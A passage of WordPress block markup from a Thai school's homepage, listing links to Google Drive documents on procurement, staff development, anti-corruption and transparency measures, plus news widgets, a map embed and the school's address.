data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f 